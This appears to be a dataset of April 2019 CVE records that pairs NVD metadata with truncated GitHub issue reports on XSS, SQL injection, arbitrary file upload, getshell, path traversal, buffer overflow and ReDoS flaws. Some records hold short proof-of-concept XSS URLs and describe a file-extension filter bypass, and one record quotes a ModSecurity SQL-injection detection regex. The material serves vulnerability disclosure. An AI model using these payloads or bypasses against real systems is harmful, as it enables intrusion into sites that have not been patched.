`http://domain.tld/display.php?browse[]=all&project=1">test</a><script>alert(123)</script>&select=desk&_=1555500329996`
## Details
The flaw exists since `$project` was assi... | XSS vulnerability in display.php | https://api.github.com/repos/mkucej/i-librarian/issues/138/comments | 2 | 2019-04-17T12:19:38Z | 2019-04-17T12:30:06Z | https://github.com/mkucej/i-librarian/issues/138 | 434,251,771 | 138 | 322 |
CVE-2019-11362 | 2019-04-20T13:29:00.277 | app/controllers/frontend/PostController.php in ROCBOSS V2.2.1 has SQL injection via the Post:doReward score paramter, as demonstrated by the /do/reward/3 URI. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/rocboss/ROCBOSS/issues/12"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
]... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:rocboss:rocboss:2.2.1:*:*:*:*:*:*:*",
"matchCriteriaId": "38F69F49-F233-46CC-835C-CC69EB854532",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | [
"89"
] | 89 | https://github.com/rocboss/ROCBOSS/issues/12 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"rocboss",
"ROCBOSS"
] | Verify that sql injection requires **registration** and **score>1**:
https://github.com/rocboss/ROCBOSS/blob/master/app/controllers/frontend/PostController.php#L460
```
if ($uid > 0) {
if ($score >= 1 && $score <= 1000) {
$topic = TopicModel::m()->getByTid($tid);
if (... | ROCBOSS V2.2.1 has SQL injection via the Post:doReward score paramter. | https://api.github.com/repos/rocboss/ROCBOSS-OLD/issues/12/comments | 1 | 2019-04-18T05:49:41Z | 2019-04-18T06:04:09Z | https://github.com/rocboss/ROCBOSS-OLD/issues/12 | 434,600,652 | 12 | 323 |
CVE-2019-11376 | 2019-04-20T15:29:00.823 | SOY CMS v3.0.2 allows remote attackers to execute arbitrary PHP code via a <?php substring in the second text box. NOTE: the vendor indicates that there was an assumption that the content is "made editable on its own. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://www.iwantacve.cn/index.php/archives/212/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/inunosinsi/soycms... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:brassica:soy_cms:3.0.2:*:*:*:*:*:*:*",
"matchCriteriaId": "A2F5113A-7204-45AD-A752-8069D5787B23",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclu... | [
"94"
] | 94 | https://github.com/inunosinsi/soycms/issues/5 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"inunosinsi",
"soycms"
] | There is one vulnerability that can getshell(Execute arbitrary php code)
Affected software:Soycms v3.0.2
Type of vulnerability:Execute arbitrary php code(can getshell)
Discovered by: Yu Yang
Affected URL:http://127.0.0.1/soycms/admin/index.php/Site/EditController/1
First,we can install the cms successlly,and we ... | There is one vulnerability that can getshell(Execute arbitrary php code) | https://api.github.com/repos/inunosinsi/soycms/issues/5/comments | 2 | 2019-04-02T07:56:02Z | 2020-09-15T09:41:22Z | https://github.com/inunosinsi/soycms/issues/5 | 428,076,440 | 5 | 324 |
CVE-2019-11377 | 2019-04-20T15:29:00.933 | wcms/wex/finder/action.php in WCMS v0.3.2 has a Arbitrary File Upload Vulnerability via developer/finder because .php is a valid extension according to the fm_get_text_exts function. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://www.iwantacve.cn/index.php/archives/208/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/vedees/wcms/issue... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:wcms:wcms:0.3.2:*:*:*:*:*:*:*",
"matchCriteriaId": "95CE7D1E-E919-449E-88D4-F6A0FCADFAF0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | [
"434"
] | 434 | https://github.com/vedees/wcms/issues/2 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"vedees",
"wcms"
] | A Arbitrary File Upload Vulnerability in wcms/wex/finder/action.php
Affected software:WCMS V0.3.2
Type of vulnerability: Arbitrary File Upload
Discovered by: Yu Yang
Use this upload feature in the developer/finder:
 access the supporting database, delete arbitrary files, access user passwords, or run arbitrary code. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/108069"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/projectsend/projectsend... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:projectsend:projectsend:r1053:*:*:*:*:*:*:*",
"matchCriteriaId": "6E0E88A9-54A1-415C-84CC-F13B8AB66643",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | [
"22"
] | 22 | https://github.com/projectsend/projectsend/issues/700 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"projectsend",
"projectsend"
] | ## Type
This is a:
[X] Bug report
### Description of the problem
It is possible for users to read arbitrary files and (potentially) access the supporting database, delete arbitrary files, access user passwords, run arbitrary code.
Watch video for detailed information:
https://youtu.be/yca1BIDVH-c
### ... | Security Flaw - read and delete arbitrary files (accessible by www-data) and run arbitrary code | https://api.github.com/repos/projectsend/projectsend/issues/700/comments | 9 | 2019-04-18T03:50:31Z | 2020-04-22T10:42:59Z | https://github.com/projectsend/projectsend/issues/700 | 434,577,772 | 700 | 326 |
CVE-2019-11371 | 2019-04-20T18:29:00.200 | BWA (aka Burrow-Wheeler Aligner) 0.7.17 r1198 has a Buffer Overflow via a long prefix that is mishandled in bns_fasta2bntseq and bns_dump at btnseq.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/lh3/bwa/issues/239"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/lh3/bwa/issues/239"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:burrow-wheeler_aligner_project:burrow-wheeler_aligner:0.7.17:r1198:*:*:*:*:*:*",
"matchCriteriaId": "303F4F49-E6CD-4A9F-A965-3494918B4510",
"versionEndExcluding": null,
"versionEndInclud... | [
"787"
] | 787 | https://github.com/lh3/bwa/issues/239 | [
"Third Party Advisory"
] | github.com | [
"lh3",
"bwa"
] | I found a buffer overflow in [bns_fasta2bntseq] function.
```
int64_t bns_fasta2bntseq(gzFile fp_fa, const char *prefix, int for_only)
{
extern void seq_reverse(int len, ubyte_t *seq, int is_comp); // in bwaseqio.c
kseq_t *seq;
char name[1024];
bntseq_t *bns;
uint8_t *pac = 0;
int32_t m_seqs, m_holes;
... | [bwa_index] Pack FASTA... *** buffer overflow detected *** | https://api.github.com/repos/lh3/bwa/issues/239/comments | 4 | 2019-04-16T17:43:42Z | 2019-12-16T19:31:50Z | https://github.com/lh3/bwa/issues/239 | 433,906,002 | 239 | 327 |
CVE-2019-11387 | 2019-04-21T02:29:00.237 | An issue was discovered in OWASP ModSecurity Core Rule Set (CRS) through 3.1.0. /rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf allows remote attackers to cause a denial of service (ReDOS) by entering a specially crafted string with nested repetition operators. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://coreruleset.org/20190627/announcement-owasp-modsecurity-core-rule-set-version-3-1-1/"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Third Party Advisory"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:modsecurity:owasp_modsecurity_core_rule_set:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CCB6BFEF-3848-4664-8520-D226834D8FF8",
"versionEndExcluding": null,
"versionEndIncluding": "3.1.0",
... | [
"400"
] | 400 | https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1359 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"SpiderLabs",
"owasp-modsecurity-crs"
] | The vulnerable regular expression is located in `/crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf` on line 913. [[Link](https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/313ae7d1e525285cd0ff1a830c4f111ffad8b9a7/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf#L913)]
The vulnerability is caused by nested repe... | Vulnerable regexp in rule 942260, 942490 (was: 942330) | https://api.github.com/repos/SpiderLabs/owasp-modsecurity-crs/issues/1359/comments | 16 | 2019-04-15T17:25:57Z | 2019-07-11T07:30:03Z | https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1359 | 433,395,994 | 1,359 | 328 |
CVE-2019-11388 | 2019-04-21T02:29:00.287 | An issue was discovered in OWASP ModSecurity Core Rule Set (CRS) through 3.1.0. /rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf allows remote attackers to cause a denial of service (ReDOS) by entering a specially crafted string with nested repetition operators. NOTE: the software maintainer disputes that this is a vulne... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1354"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:modsecurity:owasp_modsecurity_core_rule_set:*:*:*:*:*:*:*:*",
"matchCriteriaId": "22FDE55B-5185-40EF-8806-265E29C436D6",
"versionEndExcluding": null,
"versionEndIncluding": "3.1.0",
... | [
"400"
] | 400 | https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1354 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"SpiderLabs",
"owasp-modsecurity-crs"
] | The vulnerable regular expression is located in
`/crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf`
on line 404. [[Link](https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/d0440071931e0d56256348334987bd38403d33c0/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf#L404)]
The vulnerability is caused by nested repe... | Vulnerable regexp in rule 932140 | https://api.github.com/repos/SpiderLabs/owasp-modsecurity-crs/issues/1354/comments | 13 | 2019-04-15T16:03:37Z | 2019-07-05T10:27:32Z | https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1354 | 433,362,647 | 1,354 | 329 |
CVE-2019-11388 | 2019-04-21T02:29:00.287 | An issue was discovered in OWASP ModSecurity Core Rule Set (CRS) through 3.1.0. /rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf allows remote attackers to cause a denial of service (ReDOS) by entering a specially crafted string with nested repetition operators. NOTE: the software maintainer disputes that this is a vulne... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1354"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:modsecurity:owasp_modsecurity_core_rule_set:*:*:*:*:*:*:*:*",
"matchCriteriaId": "22FDE55B-5185-40EF-8806-265E29C436D6",
"versionEndExcluding": null,
"versionEndIncluding": "3.1.0",
... | [
"400"
] | 400 | https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1372 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"SpiderLabs",
"owasp-modsecurity-crs"
] | Hi there,
I am submitting this issue as the team is unable to see any impact by using the "exploit strings" i provided.
Look at the following regular expression:
```
(?i:(?:(?:(?:^[\"'`\\\\]*?[^\"'`]+[\"'`])+|(?:^[\"'`\\\\]*?[\d\"'`]+)+)\s*?(?:n(?:and|ot)|
(?:x?x)?or|between|\|\||like|and|div|&&)\s*?[\w\"'`][+... | Regarding the ReDOS exploit strings & the un-reproducibility | https://api.github.com/repos/SpiderLabs/owasp-modsecurity-crs/issues/1372/comments | 5 | 2019-04-28T08:47:31Z | 2019-12-03T00:01:52Z | https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1372 | 438,031,743 | 1,372 | 330 |
CVE-2019-11389 | 2019-04-21T02:29:00.363 | An issue was discovered in OWASP ModSecurity Core Rule Set (CRS) through 3.1.0. /rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf allows remote attackers to cause a denial of service (ReDOS) by entering a specially crafted string with next# at the beginning and nested repetition operators. NOTE: the software maintainer di... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1356"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:modsecurity:owasp_modsecurity_core_rule_set:*:*:*:*:*:*:*:*",
"matchCriteriaId": "22FDE55B-5185-40EF-8806-265E29C436D6",
"versionEndExcluding": null,
"versionEndIncluding": "3.1.0",
... | [
"400"
] | 400 | https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1356 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"SpiderLabs",
"owasp-modsecurity-crs"
] | The vulnerable regular expression is located in `/crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf` on line 642. [[Link](https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/97969eae7bb8ac7cdc6a8b8132361b701117e564/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf#L642)]
The vulnerability is caused by nested repeti... | Vulnerable regexp in rule 933161 | https://api.github.com/repos/SpiderLabs/owasp-modsecurity-crs/issues/1356/comments | 13 | 2019-04-15T16:13:02Z | 2019-10-21T07:57:03Z | https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1356 | 433,366,793 | 1,356 | 331 |
CVE-2019-11390 | 2019-04-21T02:29:00.427 | An issue was discovered in OWASP ModSecurity Core Rule Set (CRS) through 3.1.0. /rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf allows remote attackers to cause a denial of service (ReDOS) by entering a specially crafted string with set_error_handler# at the beginning and nested repetition operators. NOTE: the software ... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1358"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:modsecurity:owasp_modsecurity_core_rule_set:*:*:*:*:*:*:*:*",
"matchCriteriaId": "22FDE55B-5185-40EF-8806-265E29C436D6",
"versionEndExcluding": null,
"versionEndIncluding": "3.1.0",
... | [
"400"
] | 400 | https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1358 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"SpiderLabs",
"owasp-modsecurity-crs"
] | The vulnerable regular expression is located in `/crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf` on line 337. [[Link](https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/97969eae7bb8ac7cdc6a8b8132361b701117e564/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf#L337)]
The vulnerability is caused by nested repeti... | Vulnerable regexp in rule 933160 | https://api.github.com/repos/SpiderLabs/owasp-modsecurity-crs/issues/1358/comments | 3 | 2019-04-15T17:01:38Z | 2019-10-21T07:57:46Z | https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1358 | 433,386,680 | 1,358 | 332 |
CVE-2019-11391 | 2019-04-21T02:29:00.487 | An issue was discovered in OWASP ModSecurity Core Rule Set (CRS) through 3.1.0. /rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf allows remote attackers to cause a denial of service (ReDOS) by entering a specially crafted string with $a# at the beginning and nested repetition operators. NOTE: the software maintainer disp... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1357"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:modsecurity:owasp_modsecurity_core_rule_set:*:*:*:*:*:*:*:*",
"matchCriteriaId": "22FDE55B-5185-40EF-8806-265E29C436D6",
"versionEndExcluding": null,
"versionEndIncluding": "3.1.0",
... | [
"400"
] | 400 | https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1357 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"SpiderLabs",
"owasp-modsecurity-crs"
] | The vulnerable regular expression is located in `/crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf` on line 451. [[Link](https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/97969eae7bb8ac7cdc6a8b8132361b701117e564/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf#L451)]
The vulnerability is caused by nested repeti... | Vulnerable regexp in rule 933180 | https://api.github.com/repos/SpiderLabs/owasp-modsecurity-crs/issues/1357/comments | 3 | 2019-04-15T16:22:53Z | 2019-10-21T07:58:13Z | https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1357 | 433,371,043 | 1,357 | 333 |
CVE-2019-11401 | 2019-04-22T11:29:04.313 | A issue was discovered in SiteServer CMS 6.9.0. It allows remote attackers to execute arbitrary code because an administrator can add the permitted file extension .aassp, which is converted to .asp because the "as" substring is deleted. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/siteserver/cms/issues/1858"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:siteserver:siteserver_cms:6.9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "2BA2A7FB-FD45-492A-81C7-4F13D2D01C53",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionS... | [
"434"
] | 434 | https://github.com/siteserver/cms/issues/1858 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"siteserver",
"cms"
] | After the administrator logged in and added a new permitted extension of file such as "aassp".

The administrator can upload a malicious file which extension is "aassp".
After the file was filtered b... | There is a vulnerability that the attacker can uploads a file bypassed the filtering rule to getshell. | https://api.github.com/repos/siteserver/cms/issues/1858/comments | 4 | 2019-04-12T14:26:53Z | 2020-04-22T09:59:50Z | https://github.com/siteserver/cms/issues/1858 | 432,593,839 | 1,858 | 334 |
CVE-2019-11404 | 2019-04-22T11:29:04.580 | arrow-kt Arrow before 0.9.0 resolved Gradle build artifacts (for compiling and building the published JARs) over HTTP instead of HTTPS. Any of these dependent artifacts could have been maliciously compromised by an MITM attack. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/arrow-kt/ank/issues/35"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/arrow-kt/a... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:arrow-kt:arrow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "70E9185C-2AB7-4DE7-832E-C7F04B898592",
"versionEndExcluding": "0.9.0",
"versionEndIncluding": null,
"versionStartExcludin... | [
"311"
] | 311 | https://github.com/arrow-kt/ank/issues/35 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"arrow-kt",
"ank"
] | [CWE-829: Inclusion of Functionality from Untrusted Control Sphere](https://cwe.mitre.org/data/definitions/829.html)
[CWE-494: Download of Code Without Integrity Check](https://cwe.mitre.org/data/definitions/494.html)
The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. A... | [SECURITY] Releases are built/executed/released in the context of insecure/untrusted code | https://api.github.com/repos/arrow-kt/ank/issues/35/comments | 0 | 2019-02-19T21:46:56Z | 2019-02-20T17:05:22Z | https://github.com/arrow-kt/ank/issues/35 | 412,139,559 | 35 | 335 |
CVE-2019-11404 | 2019-04-22T11:29:04.580 | arrow-kt Arrow before 0.9.0 resolved Gradle build artifacts (for compiling and building the published JARs) over HTTP instead of HTTPS. Any of these dependent artifacts could have been maliciously compromised by an MITM attack. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/arrow-kt/ank/issues/35"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/arrow-kt/a... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:arrow-kt:arrow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "70E9185C-2AB7-4DE7-832E-C7F04B898592",
"versionEndExcluding": "0.9.0",
"versionEndIncluding": null,
"versionStartExcludin... | [
"311"
] | 311 | https://github.com/arrow-kt/arrow/issues/1310 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"arrow-kt",
"arrow"
] |
[CWE-829: Inclusion of Functionality from Untrusted Control Sphere](https://cwe.mitre.org/data/definitions/829.html)
The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artif... | [CVE-2019-11404][SECURITY] Releases are built/executed/released in the context of insecure/untrusted code | https://api.github.com/repos/arrow-kt/arrow/issues/1310/comments | 18 | 2019-02-19T13:37:39Z | 2019-05-03T20:17:50Z | https://github.com/arrow-kt/arrow/issues/1310 | 411,927,407 | 1,310 | 336 |
CVE-2019-11405 | 2019-04-22T11:29:04.783 | OpenAPI Tools OpenAPI Generator before 4.0.0-20190419.052012-560 uses http:// URLs in various build.gradle, build.gradle.mustache, and build.sbt files, which may have caused insecurely resolved dependencies. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/OpenAPITools/openapi-generator/issues/2253"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/OpenAPITools/openapi... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openapi-generator:openapi_generator:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B3208D75-72B6-4B46-A8D4-1984DA76142B",
"versionEndExcluding": "4.0.0-20190419.052012-560",
"versionEndIncluding"... | [
"311"
] | 311 | https://github.com/OpenAPITools/openapi-generator/issues/2253 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"OpenAPITools",
"openapi-generator"
] | [CWE-829: Inclusion of Functionality from Untrusted Control Sphere](https://cwe.mitre.org/data/definitions/829.html)
[CWE-494: Download of Code Without Integrity Check](https://cwe.mitre.org/data/definitions/494.html)
This project is generating starter projects that are resolving dependencies over HTTP instead of H... | [BUG][SECURITY][CVE-2019-11405] Code generator generates projects with insecure repositories | https://api.github.com/repos/OpenAPITools/openapi-generator/issues/2253/comments | 7 | 2019-02-27T14:13:28Z | 2019-06-12T11:55:07Z | https://github.com/OpenAPITools/openapi-generator/issues/2253 | 415,144,892 | 2,253 | 337 |
CVE-2019-11428 | 2019-04-22T11:29:05.767 | I, Librarian 4.10 has XSS via the export.php export_files parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/mkucej/i-librarian/issues/139"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gith... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:i-librarian:i\\,_librarian:4.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C1942913-38F2-41F7-80F9-887EE83FC680",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionS... | [
"79"
] | 79 | https://github.com/mkucej/i-librarian/issues/139 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"mkucej",
"i-librarian"
] | # Summary
The parameter **export_files** is not sanitized, so attackers can poison this parameter and then create a reflected XSS attack.
# POC
```https://i-librarian.net/demo/export.php?export_files="><script>alert(1)</script>```
# Detail
The flaw exists since **$get_post_export_files** was assigned to a GET pa... | XSS vulnerability in export.php | https://api.github.com/repos/mkucej/i-librarian/issues/139/comments | 0 | 2019-04-18T09:45:37Z | 2019-04-18T12:42:10Z | https://github.com/mkucej/i-librarian/issues/139 | 434,682,342 | 139 | 338 |
CVE-2019-11449 | 2019-04-22T14:29:00.560 | I, Librarian 4.10 has XSS via the notes.php notes parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/mkucej/i-librarian/issues/140"
